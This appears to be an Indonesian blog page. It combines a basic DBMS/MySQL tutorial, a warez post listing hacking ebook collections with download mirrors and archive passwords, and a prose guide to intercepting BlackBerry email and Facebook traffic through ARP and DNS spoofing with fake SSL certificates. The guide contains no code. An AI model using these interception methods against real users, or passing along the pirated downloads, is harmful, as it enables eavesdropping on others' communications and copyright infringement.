Kali ini saya mempersembahkan pada seluruh masyarakat dunia cyber yang ingin menjalin hubungan dengan sebuah komputer. Yaitu sebuah ebook dasar pemrograman database MySQL, di sini saya menerangkan dan menjelaskan tentang teknik pemrograman database. Untuk itulah anda yang masih baru-barunya menjadi seorang programmer, anda harus menguasai pemrograman database. Dalam hal ini kita akan mempelajari nya dengan saksama sekaligus. Menyenangkan mungkin yang ini saya sampaikan mengenai pemrogramana database, ini akan membuat otak anda sedikit berputar.

Baiklah, jika anda gak sabar untuk memahami ini semua, silahkan download modul pemrograman database yang sudah di convert di file PDF dan di bungkus ole file ZIP
Download Ebook Pemrograman Dasar Database MySQL


Database Management System Tutorial

Artikel Sumber
:http://taufik-asyadly.blogspot.com/
Hirarki Data Tradisional :
  1. Elemen data / Field : suatu elemen data terkecil yang tidak dapat dipecah lagi.
  2. Record : gabungan sebuah elemen data yang terkait.
  3. File : himpunan seluruh record yang berhubungan.
Aktifitas Manajemen Data :
  1. Pengumpulan data ; data yang diperlukan dikumpulkan dan dicatat pada sebuah form yang disebut dokumen sumber yang berfungsi sebagai input.
  2. Integritas dan Pengujian ; data diperiksa untuk meyakinkan konsistensi dan akurasi data tersebut.
  3. Penyimpanan data dan pemeliharaan.
  4. Keamanan data.
  5. Organisasi data ; data disusun sedemikian untuk memenuhi kebutuhan user.
  6. Pengambilan data ; data dibuat agar dapat digunakan oleh user yang berhak.
Dua jenis Penyimpanan Sekunder :
  • Penyimpanan Berurutan / Sequential Access Storage Device (SASD) ;
    Media penyimpan untuk mengisikan record yang diatur dalam susunan tertentu. Data pertama harus diproses pertama kali, data kedua diproses kedua kali, dst.
  • Penyimpanan Akses Langsung / Direct Access Storage Device (DASD) ;
    Mekanisme baca atau tulis yang diarahkan ke record tertentu tanpa pencarian secara urut. Komputer mikro memiliki disk drive dan hard disk.
Cara Mengolah Data :
  • Pengolahan Batch ;
    Mengumpulkan data terlebih dahulu kemudian diproses sekaligus.
  • Pengolahan On – Line ;
    Setiap data yang diinput langsung didapat output atau hasilnya.
  • Sistem Real Time ;
    Sama seperti pengolahan On – Line, hanya saja data yang ada di update sesuai dengan perubahan waktu.
KONSEP DATABASE
Database : Kumpulan data-data yang terpadu yang disusun dan disimpan dalam suatu cara sehingga memudahkan untuk dipanggil kembali.
Database Manajemen System ;
Suatu program komputer yang digunakan untuk memasukkan,mengubah,menghapus,memanipulasi dan memeperoleh data / informasi dengan praktis dan efisien.
Komponen Utama DBMS :
  • Hardware ; yang melakukan pemrosesan dan menyimpan database.
  • Data.
  • User , dapat diklasifikasikan menjadi :
    • End User ;
      • Pengguna aplikasi, yang mengoperasikan program aplikasi.
      • Pengguna interaktif, yang memberikan perintah-perintah beraras tinggi (sintak-sintak query).
    • Programmer aplikasi, yang membuat program aplikasi.
    • Database Administrator, bertanggung jawab terhadap pengelolaan database.
  • Software, sebagai interface antara user dan database.
Perintah yang digunakan untuk mengelola dan mengorganisasikan data :
  • Data Definition Language ;
Perintah yang biasa digunakan oleh DBA untuk mendefinisikan skema ke DBMS.
Skema : deskripsi lengkap tentang struktur field, record dan hubungan data pada database.
Hal yang perlu dijabarkan dalam DBMS :
  • Nama database.
  • Nama file pada database.
  • Nama field dan record.
  • Deskripsi file, record dan field.
DDL juga digunakan untuk menciptakan, mengubah dan menghapus database.
Yang termasuk dalam kelompok DDL :
    • CREATE ; membuat table.
    • ALTER ; mengubah struktur table.
    • DROP ; menghapus table.
  • Data Manipulation Language ;
Perintah yang digunakan untuk mengubah, memanipulasi dan mengambil data pada database.
DML dibagi menjadi 2 :
  1. Prosedural ; menuntut user menentukan data apa saja yang diperlukan dan bagaimana cara mendapatkannya.
  2. Non Prosedural ; menuntut user menentukan data apa saja yang diperlukan tetapi tidak perlu menyebutkan cara mendapatkannya.
Perintah yang termasuk dalam DML :
  • SELECT ; memilih data.
  • INSERT ; menambah data.
  • DELETE ; menghapus data.
  • UPDATE ; mengubah data.
Tugas – tugas Database Administrator :
  1. Perencanaan database.
  2. Penerapan database.
  3. Operasi Database.
  4. Keamanan Database.
Keuntungan Database Manajemen System :
  1. Mengurangi pengulangan data.
  2. Independensi data.
  3. Memadukan data dari beberapa file.
  4. Memanggil data dan informasi secara tepat.
  5. Meningkatkan keamanan.
Kerugian Database Manajemen System :
  1. Menggunakan software yang mahal.
  2. Menggunakan konfiguarsi hardware yang besar.
  3. Memperkerjakan dan menggaji Staf DBA yang relatif mahal.

Ebook Hacking Cracking Collection 2012


Kali ini berbagi ebook all in one [ AIO ] hacking collection 2012, ebook all in one [ AIO ] cracking collection 2012 untuk disimpan sebagai buku acuan untuk hacker & cracker di tahun 2012, berikut ini adalah ebook hacking facebook, ebook hack facebook, ebook hacking gmail, ebook hack gmail, ebook hacking yahoo, ebook hack yahoo, ebook hacking 2011. ebook hacking 2012, ebook cracking 2012, ebook hack 2012, ebook crack 2012, ebook hacker 2012, ebook cracker 2012, ebooks hacking 2012, ebooks cracking 2012, ebooks hack 2012, ebooks crack 2012, ebooks hacker 2012, ebooks cracker 2012, e-book hacking 2012, e-book cracking 2012, e-book hack 2012, e-book crack 2012, e-book hacker 2012, e-book cracker 2012, e-books hacking 2012, e-books cracking 2012, e-books hack 2012, e-books crack 2012, e-books hacker 2012, e-books cracker 2012. Silakan menggunakan ebook berikut untuk menambah ilmu pengetahuan dan wawasan. Berikut ini adalah Download Hacking Tools 2012, Hacking Tools 2012, Tools Hacking 2012, Cracking Tools 2012, Tools Cracking 2012, Tool Hack 2012, Tool Crack 2012, Tool Hacking 2012, Tool Cracking 2012, Tool Hacker 2012, Tool Cracker 2012, Tools Hacker 2012, Tools Cracker 2012 yang mungkin bisa bermanfaat untuk bisa anda pakai di 2012. Happy Hacking All.. Selamat download :)

PART 1


70 Hacking Ebook Collection 2011
English | 2011 | PDF | 700MB
Hacking The Windows Registry
Hugo Cornwall ? The Hacker?s Handbook
Hacking into computer systems -a beginners guide
Hacking_IIS_Servers
Addison-Wesley Professional.Honeypots- Tracking Hackers
Wiley.The Database Hacker?s Handbook- Defending Database Servers
John Wiley &_ Sons.Hacking GMail (ExtremeTech)
Hacking.Guide.V3.1
A-List Publishing.Hacker Linux Uncovered
Hacker?S.Delight
Hacker.Bibel
HackerHighSchool
Hacker?s Desk Reference
A Beginners Guide To Hacking Computer Systems
Addison Wesley ? Hackers Delight 2002
addison wesley ? web hacking ? attacks and defense
Addison Wesley, The Outlook Answer Book Useful Tips Tricks And Hacks (2005) Bbl Lotb
amazon-hacks
Anti-Hacker ToolKit ? McGraw Hill 2E 2004
Attacking the DNS Protocol
Auerbach.Practical.Hacking.Techniques.and.Counterm easures.Nov.2006
Auerbach.Pub.The.Hackers.Handbook.The.Strategy.Beh ind.Breaking.into.and.Defending.Networks
bsd-hacks
ceh-official-certified-ethical-hacker-review-guide-exam
Certified Ethical Hacker (CEH) v3.0 Official Course
Computer ? Hackers Secrets ? e-book
cracking-sql-passwords
Crc Press ? The Hacker?S Handbook
Credit.Card.Visa.Hack.Ucam.Cl.Tr.560
DangerousGoogle-SearchingForSecrets
database hacker handbook
Dummies ? Hack How To Create Keygens (1)
ebay-hacks-100-industrial-strength-tips-and-tools
ebook.oreilly.-.windows.xp.hacks.sharereactor
eBooks.OReilly.-.Wireless.Hacks.100.Industrial.-.Strength.Tips.and.Tools
ethical hacking, student guide
excel-hacks
For.Dummies.Hacking.for.Dummies.Apr.2004.eBook-DDU
For.Dummies.Hacking.Wireless.Networks.For.Dummies. Sep.2005.eBook-DDU
google-hacks
Hack IT Security Through Penetration Testing
Hack Proofing ? Your Network ? Internet Tradecraft
Hack Proofing Linux A Guide to Open Source Security
Hack Proofing Sun Solaris 8
Hack Proofing Your E-Commerce Site
Hack Proofing Your Identity In The Information Age
Hack Proofing Your Network Second Edition
Hack Proofing Your Network_First Edition
Hack Proofing Your Web Applications
Hacker Disassembling Uncovered
hacker ethic
Hacker Linux Uncovered
Hacker Web Exploitation Uncovered
Hacker?S.Delight
hacker-disassembling
Hackers Beware
Hackers Secrets Revealed
Hackers Secrets
Hackers, Heroes Of The Computer Revolution
Hackers_Secrets
Hacker_s_Guide
Hacking ? Firewalls And Networks How To Hack Into Remote Computers
Hacking ? The Art of Exploitation
Hacking Cisco Routers
Hacking Exposed ? Network Security Secrets & Solutions, 2nd Edition
Hacking Exposed Network Security Secrets & Solutions, Third Edition ch1
Hacking For Dummies 1
Hacking For Dummies 2
Hacking For Dummies
DOWNLOAD LINK:
DOWNLOAD LINK MIRROR 1 – PART 1
DOWNLOAD LINK MIRROR 1 – PART 2
DOWNLOAD LINK MIRROR 1 – PART 3
DOWNLOAD LINK MIRROR 2 – PART 1
DOWNLOAD LINK MIRROR 2 – PART 2
DOWNLOAD LINK MIRROR 2 – PART 3

PART 2



Hacking And Security Ebooks Collection
Size: 1.07 GB
English | pdf + chm | 177 files
Books : Misc. Educational : English
CONTENT:
(Ebook – Computer) Hacking The Windows Registry
(eBook – PDF) Hugo Cornwall – The Hacker’s Handbook
(eBook pdf) Hacking into computer systems – a beginners guide
(ebook_-_pdf)_Hacking_IIS_Servers file*serve..com
0321108957.Addison-Wesley Professional.Honeypots- Tracking Hackers
0764578014.Wiley.The Database Hacker’s Handbook- Defending Database Servers
076459611X.John Wiley &_ Sons.Hacking GMail (ExtremeTech)
076459611X.John Wiley &amp_ Sons.Hacking GMail (ExtremeTech)
1246523-Hacking.Guide.V3.1
1931769508.A-List Publishing.Hacker Linux Uncovered
2212948-Hacker’S.Delight
285063-Hacker.Bibel.[278.kB_www.netz.ru]
3077366-HackerHighSchool
731986-Hacker’s Desk Reference
[0735710090]Hackers Beware Defending Your Network From The Wiley Hacker
A Beginners Guide To Hacking Computer Systems
Addison Wesley – Hackers Delight 2002
addison wesley – web hacking – attacks and defense
Addison Wesley, The Outlook Answer Book Useful Tips Tricks And Hacks (2005) Bbl Lotb
amazon-hacks
Anti-Hacker ToolKit – McGraw Hill 2E 2004
Attacking the DNS Protocol
Auerbach.Practical.Hacking.Techniques.and.Counterm easures.Nov.2006
Auerbach.Pub.The.Hackers.Handbook.The.Strategy.Beh ind.Breaking.into.and.Defending.Networks.Nov.20
bsd-hacks
ceh-official-certified-ethical-hacker-review-guide-exam-312-50.9780782144376.27422
Certified Ethical Hacker (CEH) v3.0 Official Course
Computer – Hackers Secrets – e-book
kracking-sql-passwords
Crc Press – The Hacker’S Handbook
Credit.Card.Visa.Hack.Ucam.Cl.Tr.560.[223.kB_www.netz.ru]
DangerousGoogle-SearchingForSecrets
database hacker handbook
Dummies – Hack How To Create Keygens (1)
ebay-hacks-100-industrial-strength-tips-and-tools
ebook.oreilly.-.windows.xp.hacks.sharereactor
eBooks.OReilly.-.Wireless.Hacks.100.Industrial.-.Strength.Tips.and.Tools
ethical hacking, student guide
excel-hacks
For.Dummies.Hacking.for.Dummies.Apr.2004.eBook-DDU
For.Dummies.Hacking.Wireless.Networks.For.Dummies. Sep.2005.eBook-DDU
google-hacks
Hack IT Security Through Penetration Testing
Hack Proofing – Your Network – Internet Tradecraft
Hack Proofing Linux A Guide to Open Source Security – Stangler, Lane – Syngress – ISBN 1-928994-34-2
Hack Proofing Sun Solaris 8
Hack Proofing Your E-Commerce Site
Hack Proofing Your Identity In The Information Age
Hack Proofing Your Network Second Edition
Hack Proofing Your Network_First Edition
Hack Proofing Your Web Applications
Hack_Attacks_Revealed_A_Complete_Reference_With_Cu stom_Security_Hacking_Toolkit
Hack_IT_Security_Through_Penetration_Testing
Hacker Disassembling Uncovered
hacker ethic
Hacker Linux Uncovered
Hacker Web Exploitation Uncovered
Hacker’S.Delight
hacker-disassembling-uncovered.9781931769228.20035
Hacker_s_Guide
Hackers Beware
Hackers Secrets Revealed
Hackers Secrets
Hackers, Heroes Of The Computer Revolution
Hackers_Secrets
Hacking – Firewalls And Networks How To Hack Into Remote Computers
Hacking – The Art of Exploitation
Hacking Cisco Routers
Hacking Exposed – Network Security Secrets & Solutions, 2nd Edition
Hacking Exposed Network Security Secrets & Solutions, Third Edition ch1
Hacking For Dummies 1
Hacking For Dummies 2
Hacking For Dummies
Hacking GMail
Hacking IIS Servers
Hacking into computer systems – a beginners guide
Hacking the Code – ASP.NET Web Application Security Cookbook (2004)
hacking the windows registry
Hacking Windows XP
Hacking-ebook – CIA-Book-of-Dirty-Tricks1
Hacking-Hacker’s Guide
Hacking-Hackers Secrets Revealed
Hacking-Hugo Cornwall-The Hacker’s Handbook
Hacking-The Hacker krackdown
Hacking.For.Dummies.Access.To.Other.People’s.Syste m.Made.Simple
Hacking.Guide.V3.1
Hackproofing Oracle Application Server
hacks
Halting.The.Hacker.A.Practical.Guide.To.Computer.S ecurity
How to krack CD Protections
John Wiley & Sons – Hacking For Dummies
John.Wiley.and.Sons.Hacking.Windows.XP.Jul.2004.eB ook-DDU
John.Wiley.and.Sons.Hacking.Windows.XP.Jul.2004.eB ook
John.Wiley.and.Sons.The.Art.of.Intrusion.The.Real. Stories.Behind.the.Exploits.of.Hackers.Intruders.a nd.Deceivers.Feb.2005.ISBN0764569597
Jon.Erickson.Hacking.The.Art.Of.Exploitation.No.St arch.Press.2003
linux-server-hacks
Linux-Server.Hacks-OReilly
little_black_book_oc_computer_viruses
mac-os-hacks
McGraw Hill – Web Applications (Hacking Exposed)
McGraw-Hill – Hacking Exposed, 3rd Ed – Hacking Exposed Win2
McGraw.Hacking.Exposed.Cisco.Networks
McGraw.Hill.HackNotes.Linux.and.Unix.Security.Port able.Reference.eBook-DDU
McGraw.Hill.HackNotes.Network.Security.Portable.Re ference.eB
McGraw.Hill.HackNotes.Network.Security.Portable.Re ference.eBook-DDU
McGraw.Hill.HackNotes.Web.Security.Portable.Refere nce.eBook-
McGraw.Hill.HackNotes.Web.Security.Portable.Refere nce.eBook-DDU
McGraw.Hill.HackNotes.Windows.Security.Portable.Re ference.eB
McGraw.Hill.HackNotes.Windows.Security.Portable.Re ference.eBook-DDU
Mind Hacks – Tips & Tricks for Using Your Brain
network-security-hacks
No.Starch.Press.Hacking.The.Art.Of.Exploitation
O’Reilly – Online Investing Hacks
O’Reilly.-.Network.Security.Hacks
O’Reilly.Windows.Server.Hack
O’Reilly.Windows.Server.Hack
O_Reilly_-_Windows_XP_Hacks
online-investing-hacks
OReilly Google Hacks, 1st Edition2003
OReilly – Flickr Hacks Tips and Tools for Sharing Photos Online (Feb 2006)
OReilly – Google Hacks
Oreilly Access Hacks Apr 2005
Oreilly, paypai Hacks (2004) Ddu
OReilly,.Digital.Video.Hacks.(2005).DDU.LotB
OReilly,.IRC.Hacks.(2004).DDU
oreilly,.visual.studio.hacks.(2005).ddu.lotb
Oreilly.Amazon.Hacks.eBook.LiB
oreilly.firefox.hacks.ebook-lib
OReilly.Google.Hacks.2nd.Edition.Dec.2004.ISBN0596 008570
OReilly.Google.Maps.Hacks.Jan.2006
Oreilly.Linux.Desktop.Hacks.Mar.2005.eBook-LiB
OReilly.Linux.Server.Hacks.Volume.Two.Dec.2005
OReilly.Network.Security.Hacks
OReilly.paypai.Hacks.Sep.2004.eBook-DDU
OReilly.PC.Hacks.Oct.2004.eBook-DDU
OReilly.Perl.Hacks.Tips.and.Tools.for.Programming. Debugging.and.Surviving.May.2006
OReilly.Skype.Hacks.Tips.and.Tools.for.Cheap.Fun.I nnovative.Phone.Service.Dec.2005
OReilly.SQL.Hacks.Nov.2006
OReilly.Statistics.Hacks.May.2006
OReilly.Ubuntu.Hacks.Tips.and.Tools.for.Exploring. Using.and.Tuning.Linux.Jun.2006
OReilly.VoIP.Hacks.Tips.and.Tools.for.Internet.Tel ephony.Dec.2005
oreilly.windows.xp.hacks.2nd.edition.feb.2005.lib
OReilly.Word.Hacks.Oct.2004.eBook-DDU
OSB.Ethical.Hacking.and.Countermeasures.EC.Council .Exam.312.50.Student.Courseware.eBook-LiB
PC Games – How to krack CD Protection
prentice hall – pipkin – halting the hacker- a practical guide to computer security, 2nd edition
Que – UNIX Hints Hacks
Que.Certified.Ethical.Hacker.Exam.Prep.Apr.2006
Security and Hacking – Anti-Hacker Tool Kit Second Edition
SoTayHacker1.0
spidering-hacks
SQL Hacks
SQLInjectionWhitePaper
Syngress – Hack Proofing Linux (2001)
Syngress – Hack Proofing Your Identity in the Information Age – 2002
Syngress – Hacking a Terror Network. The Silent Threat of Covert Channels
Syngress — Hack Proofing Your Wireless Network
Syngress Hack Proofing Your Identity in the Information Age
Syngress.Buffer.Overflow.Attacks.Dec.2004.eBook-DDU
Syngress.Hack.the.Stack.Oct.2006
Syngress.Hacking.a.Terror.Network.Nov.2004.ISBN192 8994989
The Little Black Book Of Computer Virus
the-database-hackers-handbook-defending-database-servers.9780764578014.25524
The_20Little_20Black_20Book_20of_20Computer_20Viru ses
tivo-hacks.100-industrial-strength-tips-and-tools
u23_Wiley – Hacking GPS – 2005 – (By Laxxuss)
Websters.New.World.Websters.New.World.Hacker.Dicti onary.Sep.2006
Wiley.Hacking.Firefox.More.Than.150.Hacks.Mods.and .Customizations.Jul.2005.eBook-DDU
Wiley.Hacking.Google.Maps.and.Google.Earth.Jul.200 6
Wiley.Hacking.GPS.Mar.2005.ISBN0764598805
Wiley.Lifehacker.Dec.2006
Wiley.The.Database.Hackers.Handbook.Defending.Data base.Servers
Win XP Hacks oreilly 2003
Windows Server Hacks
WinXP SP1 Hack
Xbox-hack – AIM-2002-008
Yahoo.Hacks.Oct.2005
Enjoy!
Download Links:
DOWNLOAD LINK MIRROR 1 – PART 1
DOWNLOAD LINK MIRROR 2 – PART 2
DOWNLOAD LINK MIRROR 2 – PART 3
Password: mac

PART 3


Hacking Ebooks Collection [AIO] 2011
English | 2011 | PDF | 116 Books | 1.2GB
Hacking Ebooks Collection (116 books)
Ebook – Computer) Hacking The Windows Registry.pdf
(eBook – PDF) Hugo Cornwall – The Hacker’s Handbook .pdf
(eBook pdf) Hacking into computer systems – a beginners guide.pdf
(ebook_-_pdf)_Hacking_IIS_Servers.pdf
A Beginners Guide To Hacking Computer Systems.pdf
amazon-hacks.chm
Attacking the DNS Protocol.pdf
Auerbach.Practical.Hacking.Techniques.and.Counterm easures.Nov.2006.pdf
bsd-hacks.pdf
Certified Ethical Hacker (CEH) v3.0 Official Course.pdf
Computer – Hackers Secrets – e-book.pdf
cracking-sql-passwords.pdf
Crc Press – The Hacker’S Handbook.pdf
Credit.Card.Visa.Hack.Ucam.Cl.Tr.560.[223.kB_www.netz.ru].pdf
DangerousGoogle-SearchingForSecrets.pdf
database hacker handbook.chm
Dummies – Hack How To Create Keygens (1).pdf
ebay-hacks-100-industrial-strength-tips-and-tools.pdf
eBooks.OReilly.-.Wireless.Hacks.100.Industrial.-.Strength.Tips.and.Tools.chm
ethical hacking, student guide.pdf
excel-hacks.chm
google-hacks.pdf
Guide-to-Hacking-with-sub7 (1).doc
Hack IT Security Through Penetration Testing.pdf
Hack Proofing – Your Network – Internet Tradecraft.pdf
Hack Proofing Linux A Guide to Open Source Security – Stangler, Lane – Syngress – ISBN 1-928994-34-2.pdf
Hack Proofing Sun Solaris 8.pdf
Hack Proofing Your E-Commerce Site.pdf
Hack Proofing Your Identity In The Information Age.pdf
Hack Proofing Your Network Second Edition.pdf
Hack Proofing Your Network_First Edition.pdf
Hack Proofing Your Web Applications.pdf
Hacker Disassembling Uncovered.chm
hacker ethic.pdf
Hacker Linux Uncovered.chm
Hacker Web Exploitation Uncovered.chm
Hacker’S.Delight.chm
Hackers Beware.pdf
Hackers Secrets Revealed.pdf
Hackers Secrets.pdf
Hackers, Heroes Of The Computer Revolution.pdf
Hackers_Secrets.pdf
Hacker_s_Guide.pdf
Hacking – Firewalls And Networks How To Hack Into Remote Computers.pdf
Hacking – The Art of Exploitation.chm
Hacking Cisco Routers.pdf
Hacking Exposed – Network Security Secrets & Solutions, 2nd Edition.pdf
Hacking Exposed Network Security Secrets & Solutions, Third Edition ch1.pdf
Hacking For Dummies 1.pdf
Hacking For Dummies 2.pdf
Hacking For Dummies.pdf
Hacking GMail.pdf
Hacking IIS Servers.pdf
Hacking into computer systems – a beginners guide.pdf
hacking the windows registry .pdf
Hacking Windows XP.pdf
Hacking-ebook – CIA-Book-of-Dirty-Tricks1.pdf
Hacking-Hacker’s Guide.pdf
Hacking-Hackers Secrets Revealed.pdf
Hacking-Hugo Cornwall-The Hacker’s Handbook .pdf
Hacking-The Hacker Crackdown.pdf
Hacking.For.Dummies.Access.To.Other.People’s.Syste m.Made.Simple.pdf
Hacking.Guide.V3.1.pdf
Hacking.nfo
Hacking.sfv
Hackproofing Oracle Application Server.pdf
Hack_Attacks_Revealed_A_Complete_Reference_With_Cu stom_Security_Hacking_Toolkit.
chm
Hack_IT_Security_Through_Penetration_Testing.chm
haking.txt
Halting.The.Hacker.A.Practical.Guide.To.Computer.S ecurity.chm
How to Crack CD Protections.pdf
John Wiley & Sons – Hacking For Dummies.pdf
John.Wiley.and.Sons.Hacking.Windows.XP.Jul.2004.eB ook-DDU.pdf
linux-server-hacks.pdf
little_black_book_oc_computer_viruses.pdf
mac-os-hacks.chm
McGraw-Hill – Hacking Exposed, 3rd Ed – Hacking Exposed Win2.pdf
McGraw.Hacking.Exposed.Cisco.Networks.chm
McGraw.Hill.HackNotes.Network.Security.Portable.Re ference.eB.pdf
McGraw.Hill.HackNotes.Web.Security.Portable.Refere nce.eBook-.pdf
McGraw.Hill.HackNotes.Windows.Security.Portable.Re ference.eB.pdf
Mind Hacks – Tips & Tricks for Using Your Brain.chm
network-security-hacks.chm
No.Starch.Press.Hacking.The.Art.Of.Exploitation.ch m
O’Reilly – Online Investing Hacks.chm
O’Reilly.-.Network.Security.Hacks.chm
O’Reilly.Windows.Server.Hack.chm
O’Reilly.Windows.Server.Hack.rar
online-investing-hacks.chm
OReilly Google Hacks, 1st Edition2003.pdf
OReilly – Google Hacks.pdf
Oreilly, Paypal Hacks (2004) Ddu.chm
OReilly,.IRC.Hacks.(2004).DDU.chm
OReilly.SQL.Hacks.Nov.2006.chm
OSB.Ethical.Hacking.and.Countermeasures.EC.Council .Exam.312.50.Student.Coursewar
e.eBook-LiB.chm
O_Reilly_-_Windows_XP_Hacks.chm
PC Games – How to Crack CD Protection.pdf
Security and Hacking – Anti-Hacker Tool Kit Second Edition.chm
SoTayHacker1.0.chm
spidering-hacks.chm
SQL Hacks.chm
SQLInjectionWhitePaper.pdf
Syngress – Hacking a Terror Network. The Silent Threat of Covert Channels.pdf
Syngress — Hack Proofing Your Wireless Network.pdf
Syngress Hack Proofing Your Identity in the Information Age.pdf
Syngress.Buffer.Overflow.Attacks.Dec.2004.eBook-DDU.pdf
Syngress.Hack.the.Stack.Oct.2006.pdf
The Little Black Book Of Computer Virus.pdf
The_20Little_20Black_20Book_20of_20Computer_20Viru ses.pdf
tivo-hacks.100-industrial-strength-tips-and-tools.pdf
u23_Wiley – Hacking GPS – 2005 – (By Laxxuss).pdf
Wiley.The.Database.Hackers.Handbook.Defending.Data base.Servers.chm
Win XP Hacks oreilly 2003.chm
Windows Server Hacks.chm
WinXP SP1 Hack.pdf
Xbox-hack – AIM-2002-008.pdf
Yahoo.Hacks.Oct.2005.chm
DOWNLOAD LINK
DOWNLOAD LINK MIRROR 1
Pass: Warez-home.net

PART 4


Hackers Underground Training 2011 (Ebook + Video)
English | 2010 | PDF + AVI | ISO | 1GB
Genre: eLearning
The Hacker?s Underground Training will guide you through password hacking, windows hacking, malware, phising, web hacking, network hacking and Linux (intro, installation, etc). All this material fully packed with images, thus being a top step-by-step guide, on the course of which you cannot fail.
How will the skills uncovered in this handbook affect me?
- You will learn all the hackers underground tricks and learn to apply them in real world situations.
- You will be put into a hackers mindset and learn to think like one.
- By Learning how a hacker thinks and acts, you will be able to protect yourself from future hack attacks.
- You will aquire knowledge nonexistant to 99.9% of the people in the world!
- This Underground handbook may get you interested in pursuing a career as an Ethical Hacker.
CD1 Content
Session 1
# Understand the Purpose of the Course and the Phases of Hacking
# Acquire the Hardware and Software for Your Laboratory
# Build the Windows 2000/XP Hacker Tool Analysis Laboratory
# Build the Linux Hacker Tool Analysis Laboratory
# Test Your Laboratory and Keep It Secure
Session 2
# Understand Low-Tech and Computer-Based Reconnaissance
# Use Sam Spade to Gather Information About Target
# Search the Web for Interesting Target Information
Session 3
# Understand Scanning Techniques
# Search for Modems Using THC-Scan
# Develop a Network Map Using Cheops-ng
# Conduct a Port Scan Using Nmap
# Scan for Vulnerabilities Using Nessus
CD2 Content
Session 4
# Analyze Buffer Overflows
# Crack Passwords on Windows and Linux
# Sniff Data from the Network Using Sniffit
# Use Netcat, the Swiss Army Knife of Hacker Tools
Session 5
# Analyze an Application-Level Trojan Horse Backdoor (VNC)
# Analyze a Traditional RootKit (LRK4)
# Analyze a Kernel-Level RootKit (Kernel Intrusion System)
Session 6
# Understand File Hiding in Windows
# Understand File Hiding in UNIX
# Analyze Protocol Tunneling Using Reverse WWW Shell
# Analyze Covert Channels Using Covert-TCP
DOWNLOAD LINK
DOWNLOAD LINK MIRROR 1
DOWNLOAD LINK MIRROR 2
Password: Warez-home.net

PART 5


Hacking Exposed eBooks Collection
English | 10 eBook | PDF | 180MB
Collection of Hacking Exposed Series 2010 all in PDF and CHM Hacking Exposed:
Linux #0072127732
Hacking Exposed: Network Security, 2th Ed. #0072127481
Hacking Exposed: Network Security, 3rd Ed. #0072193816
Hacking Exposed: Network Security, 5th Ed. #0072260815
Hacking Exposed: VoIP #0072263644 Hacking Exposed: Web 2.0 #0071494618
Hacking Exposed: Web Applications #0072262990
Hacking Exposed: Windows, 3rd Ed. #007149426X
Hacking Exposed: Wireless #0072262583
DOWNLOAD LINK
DOWNLOAD LINK MIRROR 1
Sekian & terima kasih! Selamat Download :) terimakasih dateng ke blog saya
 http://taufik-asyadly.blogspot.com/

BlackBerry Hacking – Email & Facebook

Tahukan BlackBerry, tak lain adalah sebuah Handphone atau telepon Genggam yang kadang kala dapat membuat tangan kita menjadi “AUTIS” hehehe, ternyata dibalik kemewahannya perangkat yang satu ini bisa juga diserang (attack) dengan menggunakan jaringan wireless yang sudah disematkan pada generasi terbaru Blackberry. Dan serangan yang secara umun serangan dilakukan adalah via TCP/IP dengan menggunakan metode “arpspoof dab dnsspoof”.
Karena menurut beberapa ahli bahwa salah satu kelemahan sekaligus kekuatan Blackberry adalah adanya feature “proxying” yang hampir ada pada setiap device dari RIM ini, yang mana hampir secara keseluruhan layananan Blackberry baik itu e-mail (pushmail), browsing baik dari dan menuju perangkat Blackberry kita melalui server Blackberry (untuk kawasan ASIA PASIFIK) server berada ap.blackberry.com
6134_1129559517483_1182078273_30396283_6759743_nAda beberapa metode yang bisa mengakibatkan perangkat Blackberry di “Attack”.
1. ARP Spoofing :
Untuk dapat melakukan capture data melalui switches network, salah satu cara yang bisa dilakukan adalah dengan “meracuni/meng-inject” tabel ARP pada perangkat Blackberry yang dikenal sebagai ARP Spoofing yang bisa juga kita sebut sebagai metode ARP poisoning atau ARP poison routing. Tabel ARP inilah yang digunakan perangkat Blackberry untuk berkomunikasi dengan netwok device yang lain.
sebagai contoh, ketika seseorang mencoba untuk mengkoneksikan Blackberrynya ke salah satu wireless access point (WAP) hingga terhubung ke dalam jaringan, dan selanjutnya dengan menggunakan teknik serangn ARP spoofing guna meracuni tabel dalam ARP (internal) yang dimiliki oleh Blackberry, sehingga Blackberry yang telah diracuni berikut dengan server akan mengirim seluruh data dari dan menuju Blackberry yang diracuni melewati Blackberry “attacker” terlebih dulu.
Jika diilustrasikan kira sebagai berikut :
6134_1129563157574_1182078273_30396295_7612835_ndengan metode ini ternyata bahwa seluruh aliran data bisa diterima oleh “attacker” terlebih dulu melewati komputer yang telah diatur sebelumnya, dengan menggunakan tool’s Cain Abel yang mana applikasi ini juga secara otomatis menciptakan sertifikat palsu (fake) yang nantinya akan memalsukan sertifikat asli yang digunakan oleh ap.blackberry.com akan tetapi juga harus dingat bahwa seluruh koneksi akan di=”proxy” oleh rcp.ap.blackberry.com dan komunikasi akan menggunakan SSL :
6134_1129559677487_1182078273_30396287_5563037_nKemudian attacker dapat meng-capture traffic jaringan untuk dianalisa lebih lanjut, disamping itu biasanya attacker juga menggunakan program “Wireshark” untuk menampung data yang akan di decrypt menggunakan aplikasi lain yang disebut juga SSL**** , metode ini digunakan untuk mengubah data tersebut menjadi “cleartext” dengan menggunakan sertifikat palsu tentunya.
2. DNS Spoofing :
Metode kedua ini dilakukan dengan memanfaatkan topologi (peta/mapping) network model “proxying” yang digunakan Blackberry terhadap rcp.ap.blackberry.com. Dengan cara maka seluruh perangkat Blackberry yang mengunakan jaringan server regional (Asia Pasific) akan mengira bahwa server (WAP=wireless access point) yang telah diset oleh attacker sebagai server regional BIS “DNS Spoofing is the art of making a DNS to point to an another IP that it would be supposed to point to”
Ada beberapa langkah yang harus dilakukan oleh attacker pertama-tama dengan melakukan spoofing DNS entri dari server DNS (dengan menggunakan WAP, maka attacker akan masuk ke server dan menambahkan entri sebagai berikut rcp.ap.blackberry.com yang kemudian akan dikonfigurasi oleh komputer yang telah diset sebelumnya untuk melakukan “capture data, edit, serta manipulasi data”
Setelah berhasil menambahkan rcp.ap.blackberry.com maka dengan kata lain seluruh blackberry yang terkoneksi ke access point dan DNS tersebut akan dengan sukarela masuk ke dalam komputer attacker dan attacker akan mengkonfigurasi antara blackbery dengan server menggunakan SSL. Akan tetapi jika jeli maka saat melakukan browsing sementara blackberry sudah di “HacK” sebenarnya blackberry kita akan memberikan peringatan seperti ini :
